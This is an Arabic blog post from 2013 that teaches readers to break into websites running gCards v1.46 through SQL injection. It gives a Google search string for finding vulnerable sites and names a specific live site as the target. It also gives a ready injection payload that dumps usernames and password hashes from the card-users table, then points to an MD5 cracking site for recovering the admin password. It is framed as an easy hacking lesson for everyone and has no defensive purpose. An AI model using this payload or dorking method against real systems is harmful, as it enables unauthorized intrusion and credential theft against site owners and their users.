مواضيع هامة !!

lundi 30 décembre 2013

ثغرة sql سهلة للجميع


 ثغرة sql سهلة للجميع

السـلام عليكم ورحمـة الله وبركاته

كيف حالكم شباب عساكم بخير ان شاءالله

عندي درس عن لاختراق باستخدام ثغرات SQL

السكربت الي عندنا يحتوي على ثغرة اسمة gCards v1.46

طريقة البحث عن السكربت اذهب الي google

واكتب الدورك :
Powered by gCards v1.46


المواقع كثيـره مصاابـه زي مآأنتم شاايفين الحين انا بطبق على موقع عندي
ستخرج لك مواقع كثيرة مصابة

أخترنا منها هذا الموقع :
http://www.feve.de


اما طريقة الاستغلال جاهزة مجرد تربطة بالرابط
هذا هو رابط الاستغلال:.


getnewsitem.php?newsid=1+union+select+1,2,concat(u ser****,0x3a3a,userpass),4,5+from+gc_cardusers


نضيفة بعد السكربت

لاحظ معي

الحين نروح فك الباسورد المشفر .. تابع معي مبروك انت كذا طلعت الادمن والباسورد تابع معي

http://md5.rednoize.com
 
 

0 commentaires:

Enregistrer un commentaire